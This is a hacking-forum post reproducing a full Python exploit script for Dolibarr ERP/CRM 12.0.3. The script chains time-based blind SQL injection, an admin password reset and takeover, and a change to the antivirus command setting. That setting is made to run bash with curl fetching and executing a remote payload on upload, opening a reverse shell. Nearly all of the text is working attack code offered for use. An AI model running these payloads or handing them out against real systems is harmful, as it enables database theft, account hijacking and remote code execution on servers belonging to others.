Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Dolibarr 12.0.3 - SQLi to RCE

 Share


Recommended Posts

# Exploit Title: Dolibarr 12.0.3 - SQLi to RCE
# Date: 2/12/2020
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/
# Version: 12.0.3

import argparse
import binascii
import random
import re
from io import BytesIO
from urllib.parse import quote_plus as qp

import bcrypt
import pytesseract
import requests
from bs4 import BeautifulSoup
from PIL import Image

DELTA = None
DEBUG = 1
SESSION = requests.session()
TRESHOLD = 0.80
DELAY = 1
LIKE = "%_subscription"
COLUMNS = ["login", "pass_temp"]


def usage():
    banner = """NAME: Dolibarr SQLi to RCE (authenticate)
SYNOPSIS: python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PAS=
SWORD>
EXAMPLE:
    python3 sqli_to_rce_12.0.3.py -t "http://127.0.0.1/projects/dolibarr/12=
.0.3/htdocs/" -u test -p test
AUTHOR: coiffeur
    """
    print(banner)
    exit(-1)


def hex(text):
    """Return *text* as a ``0x``-prefixed hexadecimal string.

    The text is encoded to bytes with the default codec (UTF-8) and each
    byte is rendered as two lowercase hex digits.

    NOTE: this function shadows the ``hex`` builtin for the whole module.
    """
    encoded = text.encode()
    return f"0x{encoded.hex()}"


def hash(password):
    """Return a bcrypt hash of *password* as a text string.

    A new salt is generated on every call, so hashing the same password
    twice yields different results.

    NOTE: this function shadows the ``hash`` builtin for the whole module.
    """
    digest = bcrypt.hashpw(password.encode(), bcrypt.gensalt())
    return digest.decode()


def authenticate(url, username, password):
    datas = {
        "actionlogin": "login",
        "loginfunction": "loginfunction",
        "username": username,
        "password": password
    }
    r = SESSION.post(f"{url}index.php", data=datas,
                     allow_redirects=False, verify=False)
    if r.status_code != 302:
        if DEBUG:
            print(f"[x] Authentication failed!")
        return 0
    if DEBUG:
        print(f"    [*] Authenticated as: {username}")
    return 1


def get_antispam_code(base_url):
    code = ""
    while len(code) != 5:
        r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False)
        temp_image = f"/tmp/{random.randint(0000,9999)}"
        with open(temp_image, "wb") as f:
            f.write(r.content)
        with open(temp_image, "rb") as f:
            code = pytesseract.image_to_string(
                Image.open(BytesIO(f.read()))).split("\n")[0]
        for char in code:
            if char not in "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679":
                code = ""
                break
    return code


def reset_password(url, login):
    for _ in range(5):
        code = get_antispam_code(url)
        headers = {
            "Referer": f"{url}user/passwordforgotten.php"
        }
        datas = {
            "action": "buildnewpassword",
            "username": login,
            "code": code
        }
        r = SESSION.post(url=f"{url}user/passwordforgotten.php",
                         data=datas, headers=headers, verify=False)
        if r.status_code == 200:
            for response in [f"Request to change password for {login} sent =
to", f"Demande de changement de mot de passe pour {login} envoy=C3=A9e"]:
                if r.text.find(response):
                    if DEBUG:
                        print(f"    [*] Password reset using code: {code}")
                    return 1
    return 0


def change_password(url, login, pass_temp):
    r = requests.get(url=f"{url}user/passwordforgotten.php?action=val=
idatenewpassword&username={qp(login)}&passwordhash={hash(pass_temp)}",
                     allow_redirects=False, verify=False)
    if r.status_code == 302:
        if DEBUG:
            print(f"    [*] Password changed: {pass_temp}")
        return 1
    return 0


def change_binary(url, command, parameters):
    headers = {
        "Referer": f"{url}admin/security_file.php"
    }
    datas = {
        "action": "updateform",
        "MAIN_UPLOAD_DOC": "2048",
        "MAIN_UMASK": "0664",
        "MAIN_ANTIVIRUS_COMMAND": command,
        "MAIN_ANTIVIRUS_PARAM": parameters
    }
    r = SESSION.post(url=f"{url}admin/security_file.php",
                     data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        for response in ["Record modified successfully", "Enregistrement mo=
difi=C3=A9 avec succ=C3=A8s"]:
            if response in r.text:
                if DEBUG:
                    print(f"    [*] Binary's path changed")
                return 1
    return 0


def trigger_exploit(url):
    headers = {
        "Referer": f"{url}admin/security_file.php"
    }
    files = {
        "userfile[]": open("junk.txt", "rb"),
    }
    datas = {
        "sendit": "Upload"
    }
    if DEBUG:
        print(f"    [*] Triggering reverse shell")
    r = SESSION.post(url=f"{url}admin/security_file.php",
                     files=files, data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        for response in ["File(s) uploaded successfully", "The antivirus pr=
ogram was not able to validate the file (file might be infected by a virus)=
", "Fichier(s) t=C3=A9l=C3=A9vers=C3=A9s(s) avec succ=C3=A8s", "L'antivirus=
 n'a pas pu valider ce fichier (il est probablement infect=C3=A9 par un vir=
us) !"]:
            if response in r.text:
                if DEBUG:
                    print(f"    [*] Exploit done")
                return 1
    return 0


def get_version(url):
    r = SESSION.get(f"{url}index.php", verify=False)
    x = re.findall(
        r"Version Dolibarr [0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}", r.text)
    if x:
        version = x[0]
        if "12.0.3" in version:
            if DEBUG:
                print(f"    [*] {version} (exploit should work)")
            return 1
    if DEBUG:
        print(f"[*] Version may not be vulnerable")
    return 0


def get_privileges(url):
    r = SESSION.get(f"{url}index.php", verify=False)
    x = re.findall(r"id=\d", r.text)
    if x:
        id = x[0]
        if DEBUG:
            print(f"    [*] id found: {id}")
        r = SESSION.get(f"{url}user/perms.php?{id}", verify=False)
        soup = BeautifulSoup(r.text, 'html.parser')
        for img in soup.find_all("img"):
            if img.get("title") in ["Actif", "Active"]:
                for td in img.parent.parent.find_all("td"):
                    privileges = [
                        "Consulter les commandes clients", "Read customers =
orders"]
                    for privilege in privileges:
                        if privilege in td:
                            if DEBUG:
                                print(
                                    f"    [*] Check privileges: {privilege}=
")
                            return 1
    if DEBUG:
        print(f"[*] At the sight of the privileges, the exploit may fail")
    return 0


def check(url, payload):
    headers = {
        "Referer": f"{url}commande/stats/index.php?leftmenu=orders"
    }
    datas = {"object_status": payload}
    r = SESSION.post(url=f"{url}commande/stats/index.php",
                     data=datas, headers=headers, verify=False)
    return r.elapsed.total_seconds()


def evaluate_delay(url):
    global DELTA
    deltas = []
    payload = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))"
    for _ in range(4):
        deltas.append(check(url, payload))
    DELTA = sum(deltas)/len(deltas)
    if DEBUG:
        print(f"    [+] Delta: {DELTA}")


def get_tbl_name_len(url):
    i = 0
    while 1:
        payload = f"IF((SELECT LENGTH(table_name) FROM information_schema=
.tables WHERE table_name LIKE {hex(LIKE)})>{i}, SLEEP(0), SLEEP({DELAY}))"
        if check(url, payload) >= DELTA*TRESHOLD:
            return i
        if i > 100:
            print(f"[x] Exploit failed")
            exit(-1)
        i += 1


def get_tbl_name(url, length):
    tbl_name = ""
    for i in range(1, length+1):
        min, max = 0, 127-1
        while min < max:
            mid = (max + min) // 2
            payload = f"IF((SELECT ASCII(SUBSTR(table_name,{i},1)) FROM i=
nformation_schema.tables WHERE table_name LIKE {hex(LIKE)})<={mid}, SLEEP=
({DELAY}), SLEEP(0))"
            if check(url, payload) >= DELTA*TRESHOLD:
                max = mid
            else:
                min = mid + 1
        tbl_name += chr(min)
    return tbl_name


def get_elt_len(url, tbl_name, column_name):
    i = 0
    while 1:
        payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMI=
T 1)>{i}, SLEEP(0), SLEEP({DELAY}))"
        if check(url, payload) >= DELTA*TRESHOLD:
            return i
        if i > 100:
            print(f"[x] Exploit failed")
            exit(-1)
        i += 1


def get_elt(url, tbl_name, column_name, length):
    elt = ""
    for i in range(1, length+1):
        min, max = 0, 127-1
        while min < max:
            mid = (max + min) // 2
            payload = f"IF((SELECT ASCII(SUBSTR({column_name},{i},1)) FRO=
M {tbl_name} LIMIT 1)<={mid} , SLEEP({DELAY}), SLEEP(0))"
            if check(url, payload) >= DELTA*TRESHOLD:
                max = mid
            else:
                min = mid + 1
        elt += chr(min)
    return elt


def get_row(url, tbl_name):
    print(f"    [*] Dump admin's infos from {tbl_name}")
    infos = {}
    for column_name in COLUMNS:
        elt_length = get_elt_len(url, tbl_name, column_name)
        infos[column_name] = get_elt(url, tbl_name, column_name, elt_leng=
th)
    if DEBUG:
        print(f"    [+] Infos: {infos}")
    return infos


def main(url, username, password):
    # Check if exploit is possible
    print(f"[*] Requirements:")
    if not authenticate(url, username, password):
        print(f"[x] Exploit failed!")
        exit(-1)
    get_version(url)
    get_privileges(url)

    print(f"\n[*] Starting exploit:")
    # Evaluate delay
    evaluate_delay(url)
    print(f"    [*] Extract prefix (using table: {LIKE})")
    tbl_name_len = get_tbl_name_len(url)
    tbl_name = get_tbl_name(url, tbl_name_len)
    prefix = f"{tbl_name.split('_')[0]}_"
    if DEBUG:
        print(f"    [+] Prefix: {prefix}")

    # Dump admin's infos
    user_table_name = f"{prefix}user"
    infos = get_row(url, user_table_name)
    if not infos["login"]:
        print(f"[x] Exploit failed!")
        exit(-1)

    # Reset admin's passworrd
    if DEBUG:
        print(f"    [*] Reseting {infos['login']}'s password")
    if not reset_password(url, infos["login"]):
        print(f"[x] Exploit failed!")
        exit(-1)
    infos = get_row(url, user_table_name)

    # Remove cookies to logout
    # Change admin's password
    # Login as admin
    SESSION.cookies.clear()
    if not change_password(url, infos['login'], infos['pass_temp']):
        print(f"[x] Exploit failed!")
        exit(-1)
    authenticate(url, infos['login'], infos['pass_temp'])

    # Change antivirus's binary path
    # Trigger reverse shell
    change_binary(url, "bash", '-c "$(curl http://127.0.0.1:8000/poc.txt)"'=
)
    trigger_exploit(url)
    return 0


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", help="Base URL of Dolibarr")
    parser.add_argument("-u", help="Username")
    parser.add_argument("-p", help="Password")
    args = parser.parse_args()

    if not args.t or not args.u or not args.p:
        usage()

    main(args.t, args.u, args.p)
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...